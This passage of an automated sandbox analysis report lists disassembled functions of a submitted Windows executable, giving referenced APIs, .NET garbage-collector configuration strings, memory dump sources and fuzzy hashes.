                                                                • String ID: BGCFLEnableFF$BGCFLEnableKd$BGCFLEnableKi$BGCFLEnableSmooth$BGCFLEnableTBH$BGCFLGradualD$BGCFLSmoothFactor$BGCFLSweepGoal$BGCFLSweepGoalLOH$BGCFLTuningEnabled$BGCFLff$BGCFLkd$BGCFLki$BGCFLkp$BGCG2RatioStep$BGCMLki$BGCMLkp$BGCMemGoal$BGCMemGoalSlack$BGCSpin$BGCSpinCount$GCBreakOnOOM$GCCompactRatio$GCConfigLogEnabled$GCConserveMemory$GCCpuGroup$GCDynamicAdaptationMode$GCEnableSpecialRegions$GCEnabledInstructionSets$GCGen0MaxBudget$GCGen1MaxBudget$GCHeapAffinitizeMask$GCHeapCount$GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent$GCHighMemPercent$GCLOHCompact$GCLOHThreshold$GCLargePages$GCLatencyLevel$GCLatencyMode$GCLogEnabled$GCLogFileSize$GCLowSkipRatio$GCMaxHeapCount$GCNoAffinitize$GCNumaAware$GCProvModeStress$GCRegionRange$GCRegionSize$GCRetainVM$GCSegmentSize$GCSpinCountUnit$GCTotalPhysicalMemory$GCWriteBarrier$GCgen0size$HeapVerify$System.GC.Concurrent$System.GC.ConserveMemory$System.GC.CpuGroup$System.GC.DynamicAdaptationMode$System.GC.HeapAffinitizeMask$System.GC.HeapCount$System.GC.HeapHardLimit$System.GC.HeapHardLimitLOH$System.GC.HeapHardLimitLOHPercent$System.GC.HeapHardLimitPOH$System.GC.HeapHardLimitPOHPercent$System.GC.HeapHardLimitPercent$System.GC.HeapHardLimitSOH$System.GC.HeapHardLimitSOHPercent$System.GC.HighMemoryPercent$System.GC.LargePages$System.GC.MaxHeapCount$System.GC.NoAffinitize$System.GC.RetainVM$System.GC.Server$gcConcurrent$gcConservative$gcForceCompact$gcServer
                                                                • API String ID: 2248877218-1294421646
                                                                • Opcode ID: bbebc15a06d391b634e47426a85ee41b1cd15eee1ae5e7e1e605b66f67db48ff
                                                                • Instruction ID: 7482166d3e6a1aeba16f9e82ce464376c9064ba3c05e03c442c1269018b337a3
                                                                • Opcode Fuzzy Hash: bbebc15a06d391b634e47426a85ee41b1cd15eee1ae5e7e1e605b66f67db48ff
                                                                • Instruction Fuzzy Hash: 54627EA0A09A87A4EA00FF65AC540B2E7B5AF55744BC48176D88C47372DF3CE159D3BC
                                                                Function 00007FF708E22330 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: Process$AllocCurrentTokenVirtual$AdjustCloseErrorHandleLargeLastLookupMinimumNumaOpenPagePrivilegePrivilegesValue
                                                                • String ID: SeLockMemoryPrivilege
                                                                • API String ID: 1752251271-475654710
                                                                • Opcode ID: 0ffd09a54551838e3bfea0fe03d17a518ad1bf01202d64d683db28dc408857ad
                                                                • Instruction ID: d9261fdc5c0fb850308e36cbecde5a264f584791306f63e91a199c6f0cfc1a80
                                                                • Opcode Fuzzy Hash: 0ffd09a54551838e3bfea0fe03d17a518ad1bf01202d64d683db28dc408857ad
                                                                • Instruction Fuzzy Hash: 85316172A18B4286FB20AB61FC0836AE7A1EF84784F904135DB4E47754DF3DE445C768
                                                                Function 00007FF708E174A0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 253COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFailFastRaise
                                                                • String ID: [ KeepUnwinding ]
                                                                • API String ID: 2546344036-400895726
                                                                • Opcode ID: 5598dd65ebbd99247646aaef38e9535b9ae4aadd29b4035e3fba672b154fa0d7
                                                                • Instruction ID: ee71d13e447e84e85f2da94cc78bf82cb7ed6cb6a14be187c37672a11240aa1a
                                                                • Opcode Fuzzy Hash: 5598dd65ebbd99247646aaef38e9535b9ae4aadd29b4035e3fba672b154fa0d7
                                                                • Instruction Fuzzy Hash: D0C16A32A09B4281EB54EF25EC806A9B3A4FF44F48F984176CE4D4B798DF39E495C364
                                                                Function 00007FF708E20F50 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: EnabledFeaturesState
                                                                • String ID:
                                                                • API String ID: 1557480591-0
                                                                • Opcode ID: a69d3e9b362e7824b58d1b84d5bc1932193b46f8469da0d9059eb5b96fc1029d
                                                                • Instruction ID: a3e132a04779af2a5a39ed109372a5d1f8466ee93dfd7e5027a3fa0a9f7c1350
                                                                • Opcode Fuzzy Hash: a69d3e9b362e7824b58d1b84d5bc1932193b46f8469da0d9059eb5b96fc1029d
                                                                • Instruction Fuzzy Hash: 9B51E132F0821602FF68A55ADC5A739E287AF95354F89813CC94E532C2CF7EF9028258
                                                                Function 00007FF708E18CE0 Relevance: 2.1, Strings: 1, Instructions: 834COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: @
                                                                • API String ID: 0-2766056989
                                                                • Opcode ID: 7381590a1ad0dff3268157645c52f35c3e278afbdd6390757e53cf67bfe73558
                                                                • Instruction ID: b841a0c299add22d7c2696217655e3958b69e9e4e7badd260bb22503dfe30865
                                                                • Opcode Fuzzy Hash: 7381590a1ad0dff3268157645c52f35c3e278afbdd6390757e53cf67bfe73558
                                                                • Instruction Fuzzy Hash: 8862E5B3A14B0687EB08EF28C85576DB7A5FB94B88F858135CA0D43799DF38D911C790
                                                                Function 00007FF708E2F480 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ?
                                                                • API String ID: 0-1684325040
                                                                • Opcode ID: 40a8de3c96e67d64736113d56b5356213f8b94eb32fb5567ea4fd7561a44624a
                                                                • Instruction ID: 942ab2f317076cb190bbb15936e7f433c7e1b27198870d21fb718ab2d0ed8bc3
                                                                • Opcode Fuzzy Hash: 40a8de3c96e67d64736113d56b5356213f8b94eb32fb5567ea4fd7561a44624a
                                                                • Instruction Fuzzy Hash: C912DD72A08A8682EA24EF15E8047B9E3B4FF45B94F944239DE5E43794DF3CE441C758
                                                                Function 00007FF708E13280 Relevance: 1.6, APIs: 1, Instructions: 111nativeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: BuffersFlushProcessWrite
                                                                • String ID:
                                                                • API String ID: 2982998374-0
                                                                • Opcode ID: 85cb46e46c921698087344dd5b235119a21a8c8dcb0d449614d9bfdc0bd9a332
                                                                • Instruction ID: 5e79bafba8e4bfa3d529ad18879d4b8139bc3d9592316e360ee939bcf74a08eb
                                                                • Opcode Fuzzy Hash: 85cb46e46c921698087344dd5b235119a21a8c8dcb0d449614d9bfdc0bd9a332
                                                                • Instruction Fuzzy Hash: 26418032E0CA4286FE50BB12AC412BED690BF44B94FD81475EE5E47786DF3CE445826C
                                                                Function 00007FF708E20B10 Relevance: 1.6, APIs: 1, Instructions: 55timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF708E152A9,?,?,?,?,?,?,00007FF708E126C0), ref: 00007FF708E20BDC
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: Time$FileSystem
                                                                • String ID:
                                                                • API String ID: 2086374402-0
                                                                • Opcode ID: f7044508e2273bafe2b907c88d82cec753e135389fadbd1b7416705f845d3688
                                                                • Instruction ID: 1402e8151d2871228cd88ebc4e6d29431bef7a0fc625c31eaed768244494e23d
                                                                • Opcode Fuzzy Hash: f7044508e2273bafe2b907c88d82cec753e135389fadbd1b7416705f845d3688
                                                                • Instruction Fuzzy Hash: 5F21FB71A09B5386E794AF55AC40265F3B0BF48740FA48139E94D837A1DF7CE494876C
                                                                Function 00007FF708EDC5C0 Relevance: .4, Instructions: 433COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: bc40d93d1451d162497dc8787655ef230b4829d23c943076a685d99d54b6073a
                                                                • Instruction ID: e4c32010f3eea7568dc87b213760e4ef3a6ee0fb92eb431e4638749e0e0a25b0
                                                                • Opcode Fuzzy Hash: bc40d93d1451d162497dc8787655ef230b4829d23c943076a685d99d54b6073a
                                                                • Instruction Fuzzy Hash: B8E17763F1865242F7285A289C01779E252EF90384FAC9238DE5E077C8EF3CE54AC754
                                                                Function 00007FF708E30F30 Relevance: .4, Instructions: 433COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: da1e610bb52666c3fd701a5380f5354c910048639faf2c9ab8dffb2e0c53482e
                                                                • Instruction ID: f86d5d0ba4dd2785faf2e696e43035f1dc57d415b334c22b375dd7dc7a375228
                                                                • Opcode Fuzzy Hash: da1e610bb52666c3fd701a5380f5354c910048639faf2c9ab8dffb2e0c53482e
                                                                • Instruction Fuzzy Hash: D202C672B18A8686EA149F59DC586B8F360AF45FE4F804235EA6D477D0DF3CE841D328
                                                                Function 00007FF708E42EF0 Relevance: .4, Instructions: 392COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: CurrentProcess
                                                                • String ID:
                                                                • API String ID: 2050909247-0
                                                                • Opcode ID: aa625e7ad6d461ea8f1e83c0f301fcc223c9850e116a3f83ea42e77c824a5073
                                                                • Instruction ID: 9d95b11e0f23939cbd2749e636ceae94d8efbe60dc509eb67c289fda2e7d3408
                                                                • Opcode Fuzzy Hash: aa625e7ad6d461ea8f1e83c0f301fcc223c9850e116a3f83ea42e77c824a5073
                                                                • Instruction Fuzzy Hash: 7D02BEA1E0864786FA15AF29EC45678F7B1BF45780F986636C40E237A0DF7CF481C668
                                                                Function 00007FF708E30984 Relevance: .4, Instructions: 353COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID: CounterPerformanceQuery
                                                                • String ID:
                                                                • API String ID: 2783962273-0
                                                                • Opcode ID: b96b3fff6be2f72c62437f1bb416cb8232f001749a7eb4e8ec41f641743afe5b
                                                                • Instruction ID: 39eb78abc17070a3dda32bbd44d64167942a183f71d6498490abd9ee37aaaf97
                                                                • Opcode Fuzzy Hash: b96b3fff6be2f72c62437f1bb416cb8232f001749a7eb4e8ec41f641743afe5b
                                                                • Instruction Fuzzy Hash: BA02B062B19F4645FF52EF25EC54374E7A0AF88B54FA44235D98D127A0DF3DE881C228
                                                                Function 00007FF708E37410 Relevance: .3, Instructions: 299COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 849fa08031e827f6e9b2fd6082e067d896177d8743aba1a4ef138ea0f3c4b801
                                                                • Instruction ID: 3c1279b6160aeb5e008c9114ee91406a6411d651c4674c0f1c6b44ce79bc0550
                                                                • Opcode Fuzzy Hash: 849fa08031e827f6e9b2fd6082e067d896177d8743aba1a4ef138ea0f3c4b801
                                                                • Instruction Fuzzy Hash: 95E138A2A09A4682EB60AF15DD54379F3A0EF44F94F880636EE5D07794DF7CE850C368
                                                                Function 00007FF708E27570 Relevance: .3, Instructions: 271COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3bce7f01c51951fe8a6796a3846ba96707fb0eb378672af07fb155fdb6cdd752
                                                                • Instruction ID: 8bfa1fa857eea4ef168ac9b62053c4a3179207640e2805457990cd4f8ac74a8b
                                                                • Opcode Fuzzy Hash: 3bce7f01c51951fe8a6796a3846ba96707fb0eb378672af07fb155fdb6cdd752
                                                                • Instruction Fuzzy Hash: DBD14A72A09A4396EA60EF18EC407A9F3A0FF88B48F904039DA5D47751DF3CE491C328
                                                                Function 00007FF708E44AE0 Relevance: .3, Instructions: 264COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 5e9a63ce0436d98973f32e9923d2786968c415258fc432ffc68858846b6e6d83
                                                                • Instruction ID: 6f05e35d5915b72ef8802832a45ef2116889f340d184db87504a9fd038091d6c
                                                                • Opcode Fuzzy Hash: 5e9a63ce0436d98973f32e9923d2786968c415258fc432ffc68858846b6e6d83
                                                                • Instruction Fuzzy Hash: A2C16EB1A19A4281EA00AF25EC40279F7A5FF45BA8F885235D9AD477E4CF7DE450C32C
                                                                Function 00007FF708EE8020 Relevance: .3, Instructions: 257COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a2d5c6bd47078963d0356928ff736abfb80747c30171ca104c49a2bcfdec1dea
                                                                • Instruction ID: 3e2166a6a19e4ccceaa0f56a831f0a3db9e7d5d261fae3cad7dc6a0f10ae81bd
                                                                • Opcode Fuzzy Hash: a2d5c6bd47078963d0356928ff736abfb80747c30171ca104c49a2bcfdec1dea
                                                                • Instruction Fuzzy Hash: 15A19133A0D66189EB55AB15AC1077AE7E0EF84B99F904032EE4E46794EF3CE481DB14
                                                                Function 00007FF708E1B370 Relevance: .2, Instructions: 206COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1681716190.00007FF708E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00007FF708E10000, based on PE: true
                                                                • Associated: 00000000.00000002.1681700164.00007FF708E10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681716190.00007FF7090E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681933665.00007FF7090EB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1681945677.00007FF7090ED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff708e10000_60lAWJYfsL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: fa650313665fa7f35ee28fddb5b778b8e3f2369b372fd06be19c3141504142ca
                                                                • Instruction ID: 89ec8c9ba79be428ff76527135389efbe4fc7d0043560eb0f396a8ae590c1d0a
                                                                • Opcode Fuzzy Hash: fa650313665fa7f35ee28fddb5b778b8e3f2369b372fd06be19c3141504142ca
                                                                • Instruction Fuzzy Hash: B78129B3B14A4587EF09DF29D4907ACB365EB88B94F848035CA1E47B94DF38D651CB24
